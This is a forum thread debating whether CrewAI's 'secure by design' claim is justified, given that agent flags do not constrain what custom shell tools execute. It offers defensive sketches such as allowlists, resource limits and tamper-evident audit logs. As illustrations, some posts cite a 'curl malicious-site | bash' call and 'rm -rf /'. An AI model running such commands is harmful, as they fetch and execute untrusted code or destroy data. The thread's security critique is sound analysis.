Thoughts on the claim that CrewAI is 'secure by design' in the latest release notes?

Maya O'Brien

(@agent_tinkerer)

Active Member

Joined: 1 week ago

Posts: 14

Topic starter

June 22, 2026 1:18 pm [#290]

I was reviewing the CrewAI 0.28 release notes and saw a line stating the framework is now "secure by design." That's a strong claim, especially in the multi-agent space where the attack surface gets complex fast. I'm curious what the community thinks this actually means.

My immediate thought goes to their new `Agent` class parameters like `allow_delegation` and the `step_callback`. While these are great for control, "secure by design" implies a fundamental architecture that prevents misuse, not just offers knobs to turn. For instance, if an agent with a tool that executes shell commands is given to a crew, what stops a malicious or hijacked agent from using it? Is there any sandboxing or permission inheritance I've missed?

Looking at a simple crew setup:
```python
from crewai import Agent, Crew, Task
from tools.shell_tool import ShellTool

coder = Agent(
    role='Senior Developer',
    goal='Write and execute code',
    backstory='...',
    tools=[ShellTool()],
    allow_delegation=False,
    verbose=True
)
# ... tasks and crew creation
```
If the `ShellTool` simply passes commands to `subprocess.run`, the security is entirely dependent on the tool's implementation, not the framework. The `allow_delegation` flag is a policy control, not a security boundary. Does "secure by design" refer to something deeper, like input validation on all inter-agent messages, or maybe a planned sandbox for code-executing tools?
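
To make the concern concrete, here is a minimal sketch in plain Python. It does not use CrewAI's API at all; `naive_shell_tool`, `allowlisted_shell_tool`, and `ALLOWED_BINARIES` are hypothetical names made up for illustration. The point is only that any validation lives inside the tool, where no agent-level flag is consulted.

```python
import shlex
import subprocess

# Hypothetical allowlist; a real deployment would choose its own.
ALLOWED_BINARIES = {"echo", "ls", "cat"}


def naive_shell_tool(command: str) -> str:
    """Runs whatever string the agent produced. No framework flag is consulted."""
    result = subprocess.run(command, shell=True, capture_output=True, text=True)
    return result.stdout


def allowlisted_shell_tool(command: str) -> str:
    """Parses the command into argv and refuses binaries outside the allowlist."""
    argv = shlex.split(command)
    if not argv or argv[0] not in ALLOWED_BINARIES:
        raise PermissionError(f"command not permitted: {command!r}")
    # Passing a list (shell=False) means '|' and ';' are plain arguments,
    # not shell operators.
    result = subprocess.run(argv, capture_output=True, text=True, timeout=5)
    return result.stdout
```

Even the second version is only as strong as its allowlist (`cat` can still read any file the process can), which is rather the point: the guarantee comes from the tool author, not from the framework.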

I've been focusing on prompt injection risks in chained agents, and a big part of that is trust in the messaging layer. Does this new designation mean CrewAI has added something like signed messages or role-based access control at the framework level for tools and data? The docs don't seem to reflect that yet. Perhaps it's more about the design patterns they're now encouraging.

Injection? Where?

Claire Anderson

(@arch_sec_lead)

Eminent Member

Joined: 1 week ago

Posts: 18

June 22, 2026 3:36 pm

You're right to zero in on that gap. A framework can't be 'secure by design' if the security model completely evaporates the moment you plug in a custom tool. The `allow_delegation` flag is a good policy control, but it doesn't address the fundamental execution problem you've highlighted.

What I look for in a claim like that is a clear security boundary. Does the framework provide a default, safe way to run tools with least privilege, or does it just hand off execution to whatever code I wrote? If it's the latter, they're describing a secure configuration pattern, not a secure architecture. The release notes should clarify what specific mechanisms they've built to justify that phrasing, or they risk watering down a very important term.

--ca

Logan D.

(@runtime_audit_log)

Active Member

Joined: 1 week ago

Posts: 16

June 22, 2026 7:02 pm

Absolutely. You've hit on the core contradiction. Adding a `step_callback` or a delegation flag is just adding more places to *log* an incident, not to *prevent* one.

The "secure by design" claim falls apart precisely where you point: custom tool execution. If the framework's security model doesn't extend into the runtime environment where the tool's code actually runs, it's just a suggestion. It's like saying a car is "safe by design" because it has a dashboard warning light for brake failure, but the brakes themselves are whatever third-party parts you bolted on.

What would make me even *consider* the term is if they'd introduced a default sandboxed execution context for tools, or mandatory structured logging with immutable audit trails for every action, not just optional callbacks. Without that, it's just features that help you implement your own security, which is the opposite of a design guarantee.

log with schema

Dave Orlov

(@dave_contra)

Active Member

Joined: 1 week ago

Posts: 10

June 22, 2026 9:16 pm

Exactly. It's just another web app, and we already know how to secure those. The real issue is they're calling a configurable policy a "design." A secure design would make the dangerous thing impossible, or at least make the safe path the default. Here, the dangerous thing, a tool that can run `rm -rf /`, is still perfectly possible. They've just given you a checkbox that says "don't do that maybe."

A step_callback lets you watch the disaster happen in real time. Progress, I guess.

Your threat model is missing a row.

J. Reeves

(@vuln_hunter_jay)

Eminent Member

Joined: 1 week ago

Posts: 20

June 22, 2026 10:16 pm

Good analogy with the warning light vs the brakes. It's making me think, what *would* a default sandbox even look like for these frameworks? Like a container per tool execution? That sounds heavy, but maybe it's necessary?

I'm still learning this stuff, but wouldn't that just shift the trust to the container runtime? Is there a way to do it that's both light *and* actually secure? Or is that the whole problem they're glossing over?
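
For what it's worth, one lightweight middle ground short of a container per call is OS-level resource limits on the child process. The sketch below assumes a POSIX system (the `resource` module is Unix-only), and `run_limited` is a hypothetical helper, not anything from CrewAI. It is not a sandbox: it caps CPU time and file size but does not restrict filesystem or network access.

```python
import resource
import subprocess
import tempfile


def _apply_limits() -> None:
    """Runs in the child just before exec: cap CPU time and output file size."""
    resource.setrlimit(resource.RLIMIT_CPU, (2, 2))  # seconds of CPU time
    resource.setrlimit(resource.RLIMIT_FSIZE, (1_000_000, 1_000_000))  # bytes per file


def run_limited(argv: list[str], timeout: float = 5.0) -> subprocess.CompletedProcess:
    """Run argv with a minimal environment, a scratch cwd, and rlimits applied."""
    with tempfile.TemporaryDirectory() as scratch:
        return subprocess.run(
            argv,
            cwd=scratch,                    # throwaway working directory
            env={"PATH": "/usr/bin:/bin"},  # do not leak the parent's environment
            capture_output=True,
            text=True,
            timeout=timeout,                # wall-clock limit
            preexec_fn=_apply_limits,       # not safe if the parent uses threads
        )
```

So the trust does shift, here to the kernel's rlimit enforcement instead of a container runtime. Real isolation would need something like namespaces, seccomp, or a VM on top of this.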

Tomislav Horvat

(@thread_safety_tom)

Active Member

Joined: 1 week ago

Posts: 15

June 22, 2026 11:58 pm

You're right about the checkbox analogy. The step_callback is even more brittle, because now security relies on me writing perfect, real-time validation logic that can correctly intercept and block a malicious payload before it executes. That's a huge assumption.

It reminds me of a pattern I saw in a different async framework, where the tool execution was wrapped in a mandatory policy object that couldn't be overridden, only extended. The default policy just logged, but the design forced you to acknowledge the security boundary. Here, it feels like the boundary is optional, which makes "by design" hard to justify.
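
A rough sketch of that pattern from memory, not the other framework's actual code: `ToolPolicy`, `extended_with`, and `guarded` are hypothetical names. The default policy only logs, and the only public way to change it is to add checks on top.

```python
from typing import Callable

Check = Callable[[str, dict], None]  # a check raises PermissionError to deny a call


def _log_only(tool_name: str, args: dict) -> None:
    """Default check: record the call, deny nothing."""
    print(f"[policy] {tool_name} called with {args}")


class ToolPolicy:
    """A chain of checks. The public API can add checks but not remove them."""

    def __init__(self) -> None:
        self._checks: tuple[Check, ...] = (_log_only,)

    def extended_with(self, check: Check) -> "ToolPolicy":
        """Return a stricter policy; all existing checks are kept."""
        stricter = ToolPolicy()
        stricter._checks = self._checks + (check,)
        return stricter

    def enforce(self, tool_name: str, args: dict) -> None:
        for check in self._checks:
            check(tool_name, args)


def guarded(policy: ToolPolicy, tool_name: str, fn: Callable[..., str]) -> Callable[..., str]:
    """Wrap a tool so every call passes through the policy before it runs."""
    def wrapper(**kwargs) -> str:
        policy.enforce(tool_name, kwargs)  # raises before fn is ever called
        return fn(**kwargs)
    return wrapper
```

Python can't truly stop someone from reaching into `_checks`, so this is a convention rather than a hard boundary, but it does make the check a required step in the call path instead of an optional callback.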

I wonder if the term is being used more for its marketing weight than its technical meaning.

Ella Audit

(@audit_log_ella)

Active Member

Joined: 1 week ago

Posts: 14

June 23, 2026 1:10 am

Exactly. The checkbox is a policy, not a technical barrier. A real design would enforce that policy at the boundary, regardless of the checkbox state.

The `step_callback` isn't even good logging by default. It's just a function call. Where's the mandatory, immutable audit trail? If you can't prove who did what, when, and with what parameters in a way you can't tamper with later, you're not secure by design. You're just hoping someone writes good logging.
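
As a minimal sketch of what I mean by a tamper-evident trail, here is a hash-chained log in plain Python. `AuditLog` and its field names are hypothetical and this is not something CrewAI ships. Each record stores the hash of the previous one, so editing an old entry breaks verification.

```python
import hashlib
import json
import time


class AuditLog:
    """Append-only log where each record includes the hash of the previous one."""

    GENESIS = "0" * 64

    def __init__(self) -> None:
        self._records: list[dict] = []

    def append(self, actor: str, action: str, params: dict) -> dict:
        prev_hash = self._records[-1]["hash"] if self._records else self.GENESIS
        body = {"ts": time.time(), "actor": actor, "action": action,
                "params": params, "prev": prev_hash}
        body["hash"] = self._digest(body)
        self._records.append(body)
        return body

    @staticmethod
    def _digest(body: dict) -> str:
        # Hash every field except the hash itself, with stable key order.
        payload = {k: v for k, v in body.items() if k != "hash"}
        return hashlib.sha256(json.dumps(payload, sort_keys=True).encode()).hexdigest()

    def verify(self) -> bool:
        """Recompute every hash and link; False if any record was altered."""
        prev = self.GENESIS
        for rec in self._records:
            if rec["prev"] != prev or rec["hash"] != self._digest(rec):
                return False
            prev = rec["hash"]
        return True
```

This is tamper-evident, not tamper-proof: anyone who can rewrite the whole list can recompute the chain, so the latest hash would need to be anchored somewhere the agent process cannot write.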

They've added hooks for you to build security. That's the opposite of baking it in.

Ray Selfhost

(@selfhost_dev_ray)

Active Member

Joined: 1 week ago

Posts: 11

June 23, 2026 1:14 am

Yeah, that ShellTool example nails the core issue. The framework's security boundary ends where the tool function begins. If your tool wraps `subprocess.run`, the agent runtime has zero visibility or control over what command gets executed.

So `allow_delegation=False` only governs whether this agent can hand work off to other agents; it does nothing if the primary agent itself is compromised or simply makes a bad decision. The "design" here is just a series of policy hooks that sit *outside* the execution context.

For a claim like "secure by design" to hold water in a multi-agent system, the sandboxing has to be the default execution environment, not an optional wrapper you hope the tool author implements.

Self-host or die.

Marc Thorne

(@marc_threat)

Eminent Member

Joined: 1 week ago

Posts: 17

June 23, 2026 4:06 am

The foundational error is assuming security can be applied to an execution boundary the framework doesn't control. Your ShellTool example demonstrates this perfectly. The framework's policy controls exist in a separate layer from the runtime where the tool's `subprocess.run` operates. This creates a classic capability gap.

What you're defending against here isn't just delegation, but a compromised reasoning loop within a single agent. The `allow_delegation` flag is a primitive inter-agent trust control, but it does nothing for intra-agent integrity. A more accurate design would require a mandatory tool wrapper that enforces a capability manifest before any execution, making the sandbox a non-optional component of the tool registration itself.
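
A minimal sketch of what manifest-gated registration could look like, assuming nothing about CrewAI internals: `Manifest`, `ToolRegistry`, and the capability strings are hypothetical. A tool that requests a capability the deployment has not granted never becomes callable.

```python
from dataclasses import dataclass
from typing import Callable


@dataclass(frozen=True)
class Manifest:
    """What a tool declares it needs. Field names here are illustrative."""
    name: str
    capabilities: frozenset[str] = frozenset()


class ToolRegistry:
    """Tools are registered with a manifest and called only through invoke()."""

    def __init__(self, granted: set[str]) -> None:
        self._granted = frozenset(granted)
        self._tools: dict[str, Callable[..., str]] = {}

    def register(self, manifest: Manifest, fn: Callable[..., str]) -> None:
        # Refuse registration if the tool asks for more than was granted.
        missing = manifest.capabilities - self._granted
        if missing:
            raise PermissionError(
                f"{manifest.name} requests ungranted capabilities: {sorted(missing)}"
            )
        self._tools[manifest.name] = fn

    def invoke(self, name: str, **kwargs) -> str:
        if name not in self._tools:
            raise KeyError(f"unknown or unregistered tool: {name}")
        return self._tools[name](**kwargs)
```

On its own this only checks the declaration. Without OS-level isolation behind it, a tool's function could still do more than its manifest claims, so the manifest would have to drive the sandbox configuration to close the gap.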

The claim likely stems from viewing security through a feature-checklist lens: delegation control exists, therefore delegation risk is 'designed' away. The actual attack tree shows multiple branches they haven't pruned, with the trunk being the unfettered tool execution you've identified.

Trust but verify. Actually, just verify.

Marcus Chen

(@skeptic_engineer)

Active Member

Joined: 1 week ago

Posts: 13

June 23, 2026 4:40 am

That's the whole problem in your code block. The framework's security model ends at the `tools=[ShellTool()]` line.

They've given you a flag to restrict delegation between agents, but zero architecture to stop the tool itself from doing anything. If the ShellTool runs `subprocess.run("curl malicious-site | bash", shell=True)`, the crew just happily passes the string along.

"Secure by design" would mean the tool execution isn't a black box. It isn't.

Trust but verify.

Dave 'R00t' Miller

(@safety_off_dave)

Eminent Member

Joined: 1 week ago

Posts: 18

June 23, 2026 10:21 am

Exactly. They think adding a knob equals architecture. A real design would make the dangerous thing impossible because the capability isn't exposed, not because you remembered to turn the dial.

"Don't do that maybe" is the entire philosophy. It's configuration, not security.

No safety, no problems.

Anna W.

(@appsec_anna_dev)

Active Member

Joined: 1 week ago

Posts: 8

June 23, 2026 10:28 am

Right, the knob. It's like they built a car with a "don't drive off the cliff" button on the dashboard instead of putting up a guardrail.

That phrase "configuration, not security" is spot on. It makes me wonder if the problem is even deeper, though. What if the real danger isn't forgetting to turn the dial, but that the dial itself creates a false sense of control? You can set `allow_delegation=False` on the agent that holds your ShellTool and feel secure, while the tool's own code path is still a straight line to `os.system()` with no oversight.

The design assumes the knob is the security boundary, when really the boundary is the tool's implementation, which the framework doesn't own.

Nina Bergstrom

(@nano_claw_nina)

Eminent Member

Joined: 1 week ago

Posts: 14

June 23, 2026 4:34 pm

You've hit on the key distinction. The security boundary is the tool's own code, and CrewAI's parameters are just flags on its side of that wall.

If you look at embedded security patterns, like TrustZone on ARM, the "secure by design" claim comes from hardware-enforced isolation. The secure world can't even *see* the normal world's memory unless it's explicitly shared through a controlled gate. In CrewAI, the tool's `subprocess.run` is the normal world, and the agent's `allow_delegation` flag is just a note taped to the gate that says "please knock." The gate itself is wide open.

The phrase is definitely being overused. They've provided configuration options for a security policy, but the architecture doesn't enforce one.

Omar Hassan

(@sysadmin_prod)

Eminent Member

Joined: 1 week ago

Posts: 20

June 23, 2026 9:00 pm

You're asking the right question about the ShellTool example. The release notes are talking about control over delegation flow, but you've correctly identified that the actual security boundary is the tool's own `subprocess.run` call.

The framework's parameters are just flags on the agent. They don't inspect, constrain, or validate what the tool does internally. If your ShellTool doesn't have its own validation, the `allow_delegation=False` flag is irrelevant. A compromised or poorly prompted agent can still tell its own tool to run `rm -rf /`.

What's missing is a mandatory execution context for tools, something like a capability declaration that the framework enforces before the tool's function is even called. Without that, the design delegates security to the tool author, which is the opposite of "by design."

automate, audit, repeat

Dave 'R00t' Miller

(@safety_off_dave)

Eminent Member

Joined: 1 week ago

Posts: 18

June 23, 2026 9:13 pm

"Secure by design" means the dangerous path isn't even in the codebase. Knobs are just theater.

Your ShellTool example is the whole problem. The crew runtime has no more control over that `subprocess.run` than I do over the weather. `allow_delegation=False` is a suggestion box next to a running engine.

If the framework doesn't own, isolate, and constrain the execution environment, the claim is just marketing. You're still trusting the tool author to play nice, which is the exact opposite of a secure design.

No safety, no problems.
